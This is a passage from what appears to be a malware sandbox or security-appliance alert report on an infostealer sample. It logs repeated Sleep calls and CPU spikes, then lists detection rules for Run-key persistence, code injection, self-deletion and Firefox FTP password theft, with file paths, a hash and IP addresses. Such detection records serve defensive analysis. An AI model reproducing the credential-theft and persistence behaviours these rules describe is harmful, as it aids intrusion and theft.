61609.          timestamp: 136119
61610.          repeat: 30000
61611.          sequenceNumber: 1753
61612.          processinfo:
61613.            pid: 1056
61614.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61615.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61616.          dllname: kernel32.dll
61617.          apiname: Sleep
61618.          address: 0x0041ed5b
61619.        high_cpu:
61620.          timestamp: 136260
61621.          sequenceNumber: 1754
61622.          total_cpu: 100
61623.          processinfo:
61624.            tainted: true
61625.            pid: 1824
61626.            process_cpu: 100
61627.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
61628.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61629.        apicall:
61630.          timestamp: 142835
61631.          repeat: 40000
61632.          sequenceNumber: 1755
61633.          processinfo:
61634.            pid: 1056
61635.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61637.          dllname: kernel32.dll
61638.          apiname: Sleep
61639.          address: 0x0041ed5b
61640.        apicall:
61641.          timestamp: 149699
61642.          repeat: 50000
61643.          sequenceNumber: 1756
61644.          processinfo:
61645.            pid: 1056
61646.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61647.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61648.          dllname: kernel32.dll
61649.          apiname: Sleep
61650.          address: 0x0041ed5b
61651.        apicall:
61652.          timestamp: 156531
61653.          repeat: 60000
61654.          sequenceNumber: 1757
61655.          processinfo:
61656.            pid: 1056
61657.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61658.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61659.          dllname: kernel32.dll
61660.          apiname: Sleep
61661.          address: 0x0041ed5b
61662.        high_cpu:
61663.          timestamp: 156732
61664.          sequenceNumber: 1758
61665.          total_cpu: 100
61666.          processinfo:
61667.            tainted: true
61668.            pid: 1824
61669.            process_cpu: 100
61670.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
61671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61672.        apicall:
61673.          timestamp: 163258
61674.          repeat: 70000
61675.          sequenceNumber: 1759
61676.          processinfo:
61677.            pid: 1056
61678.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61679.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61680.          dllname: kernel32.dll
61681.          apiname: Sleep
61682.          address: 0x0041ed5b
61683.        apicall:
61684.          timestamp: 170036
61685.          repeat: 80000
61686.          sequenceNumber: 1760
61687.          processinfo:
61688.            pid: 1056
61689.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61691.          dllname: kernel32.dll
61692.          apiname: Sleep
61693.          address: 0x0041ed5b
61694.        apicall:
61695.          timestamp: 176874
61696.          repeat: 90000
61697.          sequenceNumber: 1761
61698.          processinfo:
61699.            pid: 1056
61700.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61701.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61702.          dllname: kernel32.dll
61703.          apiname: Sleep
61704.          address: 0x0041ed5b
61705.        high_cpu:
61706.          timestamp: 177219
61707.          sequenceNumber: 1762
61708.          total_cpu: 100
61709.          processinfo:
61710.            tainted: true
61711.            pid: 1824
61712.            process_cpu: 100
61713.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
61714.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61715.        apicall:
61716.          timestamp: 183835
61717.          repeat: 100000
61718.          sequenceNumber: 1763
61719.          processinfo:
61720.            pid: 1056
61721.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
61722.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61723.          dllname: kernel32.dll
61724.          apiname: Sleep
61725.          address: 0x0041ed5b
61726.        high_cpu:
61727.          timestamp: 197941
61728.          sequenceNumber: 1764
61729.          total_cpu: 100
61730.          processinfo:
61731.            tainted: true
61732.            pid: 1824
61733.            process_cpu: 100
61734.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
61735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61736.        high_cpu:
61737.          timestamp: 219351
61738.          sequenceNumber: 1765
61739.          total_cpu: 100
61740.          processinfo:
61741.            tainted: true
61742.            pid: 1824
61743.            process_cpu: 100
61744.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
61745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
61746.        end-of-report:
61747.          sequenceNumber: 1766
61748.        malicious-alert:
61749.          classtype: Suspicious-Persistance-Activity
61750.          weight: 0
61751.          ruleid: 2221 : New file in AppData added to Run regkey ; Process drops a file in AppData then adds to Run regkey
61752.          msg: Process drops a file in AppData then adds to Run regkey
61753.          display-msg: New file in AppData added to Run regkey
61754.        malicious-alert:
61755.          classtype: misc-anom
61756.          weight: 100
61757.          ruleid: 10120 : Suspicious Code Injection Activity ; Suspicious Code Injection Activity
61758.          msg: Suspicious Code Injection Activity
61759.          display-msg: Suspicious Code Injection Activity
61760.        malicious-alert:
61761.          classtype: misc-anom
61762.          weight: 100
61763.          ruleid: 10005 : Code Injection Activity ; Code Injection Activity
61764.          msg: Code Injection Activity
61765.          display-msg: Code Injection Activity
61766.        malicious-alert:
61767.          classtype: Generic-Anomalous-Activity
61768.          weight: 0
61769.          ruleid: 8018 : Process Opening explorer ; Process Opening Explorer
61770.          msg: Process Opening Explorer
61771.          display-msg: Process Opening explorer
61772.        malicious-alert:
61773.          classtype: misc-anom
61774.          weight: 100
61775.          ruleid: 10072 : Process Open with Root process deleted ;  Process deleting itself
61776.          msg: Process deleting itself
61777.          display-msg: Process Open with Root process deleted
61778.        malicious-alert:
61779.          classtype: Suspicious-Persistance-Activity
61780.          weight: 0
61781.          ruleid: 4411 : Startup services added for file ; Process adding itself (non-DLL) to windows startup areas for file
61782.          msg: Process adding itself (non-DLL) to windows startup areas for file
61783.          display-msg: Startup services added for file
61784.        malicious-alert:
61785.          classtype: Data-Theft-Activity
61786.          weight: 0
61787.          ruleid: 2603 : Firefox FTP password theft ; Process stealing FTP password via registry
61788.          msg: Process stealing FTP password via registry
61789.          display-msg: Firefox FTP password theft
61790.        malicious-alert:
61791.          classtype: misc-anom
61792.          weight: 100
61793.          ruleid: 10045 : Infostealer detected ; Infostealer detected
61794.          msg: Infostealer detected
61795.          display-msg: Infostealer detected
61796.    src:
61797.      vlan: 0
61798.      ip: 172.16.4.61
61799.      host: w016004061.domain.dom
61800.    dst:
61801.      ip: 46.252.197.1
61802.    occurred: 2015-12-04 20:48:49+00
61803.      mode: tap
61804.    alert-url: https://SERVER/event_stream/events_for_bot?ma_id=134
61805.    action: notified